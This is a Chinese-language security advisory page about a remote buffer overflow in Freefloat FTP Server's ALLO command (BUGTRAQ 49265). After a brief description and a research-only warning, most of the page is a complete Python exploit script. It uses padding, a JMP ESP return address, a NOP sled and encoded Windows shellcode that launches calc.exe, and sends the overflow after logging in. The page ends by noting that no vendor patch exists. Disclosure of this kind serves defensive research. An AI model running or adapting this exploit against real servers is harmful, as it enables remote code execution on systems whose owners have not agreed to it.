发布日期：2011-08-20
更新日期：2011-08-20

受影响系统：

Freefloat Freefloat FTP Server

描述：

---

BUGTRAQ  ID: 49265

Freefloat FTP Server是免费的用于上传文件和管理有线及无线设备的软件。

Freefloat FTP Server在ALLO命令的实现上存在远程缓冲区溢出漏洞，远程攻击者可利用此漏洞在受影响应用程序中执行任意代码，也可能造成拒绝服务。

<*来源：Black.Spook
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

import socket
import sys

def usage():

        print "usage  : ./freefloatftp.py <victim_ip>  <victim_port>"
        print "example: ./freefloatftp.py 192.168.1.100 21"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


print "\n"    
print "#############################################################################"
print "#      Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit      #"
print "#############################################################################"
print "\n"


if len(sys.argv) != 3:
    usage()
        sys.exit()

ip   = sys.argv[1]
port = sys.argv[2]

junk1= "\x41" * 246
ret  = "\xED\x1E\x94\x7C" #7C941EED JMP ESP
nop  = "\x90"* 200
# windows/exec          CMD=calc.exe
shellcode =("\x89\xe3\xdb\xd4\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49"
            "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
            "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
            "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
            "\x42\x75\x4a\x49\x4d\x6f\x58\x70\x56\x4f\x54\x70\x4d\x6e"
            "\x58\x59\x58\x4b\x54\x69\x5a\x69\x4d\x61\x56\x53\x4b\x69"
            "\x52\x54\x45\x74\x4b\x44\x43\x6a\x45\x61\x50\x7a\x45\x42"
            "\x4d\x53\x58\x42\x54\x44\x43\x33\x4d\x5a\x45\x71\x58\x52"
            "\x50\x4b\x4d\x46\x5a\x76\x4d\x4b\x4c\x74\x43\x56\x45\x77"
            "\x49\x6c\x45\x6d\x4c\x43\x56\x76\x54\x6e\x56\x39\x4b\x70"
            "\x54\x4b\x4b\x4e\x51\x39\x4d\x54\x4d\x77\x51\x65\x51\x6f"
            "\x45\x6c\x54\x73\x49\x6b\x4d\x78\x45\x63\x4c\x34\x58\x36"
            "\x4e\x6e\x50\x7a\x47\x75\x54\x37\x56\x6f\x58\x50\x4b\x75"
            "\x47\x69\x49\x63\x47\x5a\x54\x5a\x4b\x4a\x5a\x6a\x4b\x55"
            "\x50\x6f\x4b\x4b\x54\x4b\x45\x4b\x4d\x4f\x4d\x79\x58\x44"
            "\x56\x30\x54\x72\x51\x4e\x51\x70\x47\x54\x4e\x6f\x43\x6f"
            "\x4e\x46\x51\x33\x4c\x6f\x56\x47\x5a\x63\x5a\x53\x43\x74"
            "\x5a\x32\x49\x5a\x45\x73\x58\x74\x4e\x49\x4e\x65\x4b\x6b"
            "\x51\x6e\x49\x65\x50\x35\x49\x4a\x51\x43\x5a\x45\x56\x6a"
            "\x4d\x45\x4e\x38\x49\x4e\x49\x69\x56\x44\x54\x49\x54\x6f"
            "\x47\x71\x52\x37\x50\x75\x49\x6c\x47\x4c\x4e\x78\x50\x78"
            "\x4b\x4c\x52\x59\x47\x6e\x45\x33\x4c\x4b\x52\x51\x51\x4d"
            "\x47\x6e\x4e\x6c\x43\x71\x47\x6c\x4f\x34\x56\x79\x43\x64"
            "\x4c\x46\x4e\x6f\x4f\x4a\x4d\x6c\x56\x57\x47\x33\x43\x6c"
            "\x47\x46\x47\x4b\x47\x58\x45\x7a\x54\x50\x43\x6f\x4e\x4f"
            "\x4b\x4f\x54\x6a\x51\x4b\x54\x64\x49\x6e\x4b\x4c\x5a\x4a"
            "\x51\x6e\x56\x45\x4e\x39\x4c\x77\x54\x65\x43\x74\x54\x38"
            "\x47\x6d\x4c\x4b\x50\x79\x4c\x5a\x58\x79\x50\x74\x4b\x6c"
            "\x4e\x30\x5a\x4b\x51\x71\x52\x46\x4d\x6b\x45\x31\x51\x67"
            "\x58\x6a\x4b\x71\x5a\x6c\x52\x57\x4b\x44\x4b\x79\x51\x6e"
            "\x54\x50\x4f\x35\x43\x72\x56\x71\x50\x67\x5a\x7a\x4b\x30"
            "\x50\x56\x4f\x67\x4e\x70\x4b\x39\x49\x6e\x50\x30\x43\x4d"
            "\x51\x48\x52\x63\x51\x4d\x51\x6e\x58\x36\x4b\x37\x56\x38"
            "\x49\x6d\x54\x73\x52\x57\x4f\x6f\x47\x6d\x45\x66\x51\x62"
            "\x4b\x6b\x4c\x59\x4f\x5a\x54\x4e\x54\x34\x52\x6c\x58\x4d"
            "\x4d\x6d\x50\x75\x51\x55\x4c\x6e\x45\x70\x58\x66\x54\x45"
            "\x47\x6f\x5a\x67\x4c\x4e\x4e\x4c\x51\x4f\x41\x41")


buff   = junk1 + ret + nop + shellcode

try:
    print("[-] Connecting to " + ip + " on port " + port + "\n")
    s.connect((ip,int(port)))
    data = s.recv(1024)
    print("[-] Sending exploit...")
    s.send("USER test\r\n")
    s.recv(1024)
    s.send("PASS test\r\n")
    s.recv(1024)
    s.send("ALLO "+buff+"\r\n")
    s.close()
    print("[-] Exploit successfully sent...")
except:
    print("[-] Connection error...")
    print("[-] Check if victim is up.")

建议：

---

厂商补丁：

Freefloat
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.freefloat.com/

浏览次数：3307
严重程度：0（网友投票）